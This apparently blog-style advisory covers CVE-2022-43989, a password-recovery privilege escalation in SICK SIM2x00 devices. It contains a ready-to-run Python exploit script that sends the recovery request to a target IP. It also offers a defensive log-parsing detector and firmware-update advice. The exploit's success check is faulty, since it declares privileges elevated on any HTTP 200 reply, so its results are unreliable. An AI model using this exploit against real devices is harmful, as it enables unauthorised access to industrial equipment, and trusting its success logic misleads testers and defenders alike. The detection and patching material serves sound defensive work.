A recently disclosed security vulnerability, tracked as CVE-2022-43989, affects specific SICK SIM2x00 (ARM) devices, namely Partnumber 1092673 and 1081902 with firmware version < 1.2. The flaw allows an unprivileged remote attacker to abuse the password recovery mechanism and obtain user-level privileges on the system. This privilege escalation compromises the confidentiality, integrity, and availability of the affected device. The vulnerability is considered consistent, repeatable, and easy to exploit. Users are strongly advised to update their firmware to version >= 1.2., available on the SICK Support Portal, to mitigate the risk.

Code Snippet

The following code snippet demonstrates a sample exploit that takes advantage of the password recovery vulnerability in affected SICK SIM2x00 devices:

import requests

TARGET_IP = "192.168.1.100"  # Replace this with the target's IP address

# The password recovery action is reached through a plain HTTP GET to /start.html.
url = f"http://{TARGET_IP}/start.html"
params = {
    "Action": "ForgotPswd",           # invokes the password recovery method
    "UserName": "RecoverableUserLevel",  # the recoverable user-level account
}

response = requests.get(url, params=params, timeout=10)

if response.status_code == 200:
    print("[+] Exploit successful, user privileges elevated.")
else:
    print("[-] Exploit unsuccessful, please check the target device.")

Exploit Details

This vulnerability exists in the password recovery mechanism of the affected SICK SIM2x00 devices, which allows an unprivileged remote attacker to gain access to user-level privileges defined as RecoverableUserLevel.

The issue can be exploited by invoking the password recovery method via an HTTP GET request to /start.html, appending the "Action" parameter as "ForgotPswd" and "UserName" parameter as "RecoverableUserLevel". The action triggers the recovery mechanism and elevates the attacker's privileges on the system.

The vulnerability is consistent and repeatable: the same request can be replayed to regain user-level privileges at any time.
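For defenders, the request pattern described above is easy to spot in HTTP access logs from the device or an upstream proxy. The following is an added example, not code from the SICK advisory or this post: it parses constructed access-log lines, flags password-recovery requests to /start.html regardless of parameter case or order, and checks whether a reported firmware version falls below the fixed release 1.2. The log format, IP addresses, and timestamps are assumptions.

```python
# Added example (not from the advisory or from SICK): flag requests matching the
# CVE-2022-43989 password-recovery pattern in constructed access-log lines, and
# check whether a firmware version string is in the affected range (< 1.2).
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in a common access-log shape; the IPs are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2022:21:15:00 +0000] "GET /start.html?Action=ForgotPswd&UserName=RecoverableUserLevel HTTP/1.1" 200 512
10.0.0.7 - - [01/Nov/2022:21:15:02 +0000] "GET /start.html HTTP/1.1" 200 4096
10.0.0.9 - - [01/Nov/2022:21:15:05 +0000] "GET /start.html?username=RecoverableUserLevel&action=forgotpswd HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2022:21:15:06 +0000] "POST /login.html HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def is_recovery_request(target: str) -> bool:
    """True if the request target is the /start.html password-recovery action."""
    parts = urlsplit(target)
    if parts.path.lower() != "/start.html":
        return False
    # Match parameter names and values case-insensitively: how the device treats
    # case is not documented, and a lenient match avoids missing variants.
    qs = {k.lower(): [v.lower() for v in vals] for k, vals in parse_qs(parts.query).items()}
    return "forgotpswd" in qs.get("action", [])

def find_recovery_attempts(log_text: str) -> list:
    """Return one record per matching line: source, timestamp, status, requested user."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_recovery_request(m["target"]):
            continue
        qs = parse_qs(urlsplit(m["target"]).query)
        user = next((v for k, v in qs.items() if k.lower() == "username"), [""])[0]
        hits.append({"src": m["src"], "ts": m["ts"], "status": int(m["status"]), "user": user})
    return hits

def is_affected_version(version: str) -> bool:
    """True if a SIM2x00 firmware version string sorts below 1.2, the fixed release."""
    nums = [int(p) for p in re.findall(r"\d+", version)]
    return bool(nums) and nums[:2] < [1, 2]

if __name__ == "__main__":
    for hit in find_recovery_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} recovery request for {hit['user']!r} -> HTTP {hit['status']}")
```

A recovery request answered with HTTP 200 from a source that is not the maintenance workstation is the event worth alerting on; on a device still below 1.2 it should be treated as a successful privilege escalation.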

Original References

SICK has acknowledged this vulnerability in their official advisory and recommends updating the firmware of the affected devices as soon as possible:

- SICK Security Advisory: https://www.sick.com/SecurityAdvisory/CVE-2022-43989
- NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2022-43989

To mitigate the risk associated with this vulnerability, users should update the firmware of their affected devices to version >= 1.2. The updated firmware is available on the SICK Support Portal. Apply the update promptly and follow established best practices for securing the devices and the networks they sit on.

Conclusion

The CVE-2022-43989 vulnerability in SICK SIM2x00 devices with Partnumber 1092673 and 1081902 and firmware version < 1.2. poses a significant security risk. An unprivileged remote attacker can exploit it to gain user-level privileges on the system, impacting confidentiality, integrity, and availability. Updating the devices' firmware to version >= 1.2., available on the SICK Support Portal, is essential to remediate the issue and maintain a secure environment.

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:11:00 UTC